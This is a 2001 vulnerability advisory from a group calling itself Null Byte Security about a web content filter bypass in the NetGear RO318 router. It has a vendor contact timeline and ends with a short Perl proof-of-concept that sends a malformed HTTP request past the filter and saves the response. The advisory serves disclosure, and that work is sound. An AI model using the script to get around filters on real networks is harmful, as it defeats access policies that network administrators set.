=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ NetGear RO318 HTTP Filter Advisory =+ =+ Null Byte Security =+ =+ http://home.tampabay.rr.com/nbs/ =+ =+ don't call it a come back =+ =+ nbs@tampabay.rr.com =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ Contents Table =+ =+ =+ =+ 1.About =+ =+ 2.Affected =+ =+ 3.Details =+ =+ 4.Contact =+ =+ 5.Conclusion =+ =+ 6.Thanks =+ =+ 7.Greets =+ =+ 8.POC =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 1.About =+ =+ =+ =+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+ =+ fully protects your small office network against intrusion. Equipped with =+ =+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+ =+ Network Address Translation (NAT) to maintain network security against =+ =+ hackers, it ensures prolonged up time and maximized productivity for your =+ =+ network. Web content filtering options let network administrators establish =+ =+ restricted access policies - based on the time of day, day of week, Web =+ =+ address keyword - and receive regular reports and instant alerts via e-mail on =+ =+ hacker attempts and browsing activities. Web-based installation instructions =+ =+ make setup easy. Your network up and running, and sharing high-speed Internet =+ =+ access with up to 253 users, in less than an hour. =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 2.Affected =+ =+ =+ =+ NetGear RO318 Cable/DSL Security Router =+ =+ =+ =+ Although the NetGear RO318 is the only router listed here we are sure there =+ =+ other routers that use the RO318's web filtering technology. =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 3.Details =+ =+ =+ =+ We are not too sure of the details ourselves because of time restraints, but =+ =+ we do have an idea. One, the web filtering component in the firmware only =+ =+ checks for fully constructed requests and thus sending a malformed, somewhat, =+ =+ request results in the retrieval of restricted content. =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 4.Contact =+ =+ =+ =+ December 2 2001: Contacted NetGear =+ =+ December 2 2001: Contacted online support =+ =+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+ =+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+ =+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+ =+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+ =+ December 8 2001: Five working days passed =+ =+ December 20 2001: Eighteen days passed =+ =+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+ =+ December 26 2001: POC released =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 5.Conclusion =+ =+ =+ =+ This is definitely a security vulnerability and not a feature. We hope Net =+ =+ Gear will fix this with their next firmware release so administrators can =+ =+ restrict necessary web-content without having to worry about this bug. =+ =+ =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 6.Thanks =+ =+ =+ =+ Bi0cide for the help =+ =+ Datagram for the help =+ =+ Natas for the help =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 7.Greets =+ =+ =+ =+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+ =+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+ =+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+ =+ Security Focus, and everyone else. =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ 8.POC =+ =+ =+ #!/usr/bin/perl #don't call it a come back #nbs@tampabay.rr.com use IO::Socket; use Getopt::Std; getopts('h:p:z', \%argv); if(!defined($argv{h})) { print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n"; print"Usage: $0 -h -p \n"; exit; } if(defined($argv{h})) { &begin } sub begin { $html = html; $host = $argv{h}; if(defined $argv{p}) { $port=$argv{p}; } else { $port = "80"; } $socket = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $host, PeerPort => "$port") or die "Connection Refused.\n"; print $socket "GET / HTTP/1.0\n\n"; while (<$socket>) { open(LOG, ">>$html"); print (LOG); } close $socket; } =+ =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+ http://www.wiretrip.net/rfp/policy.html =+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+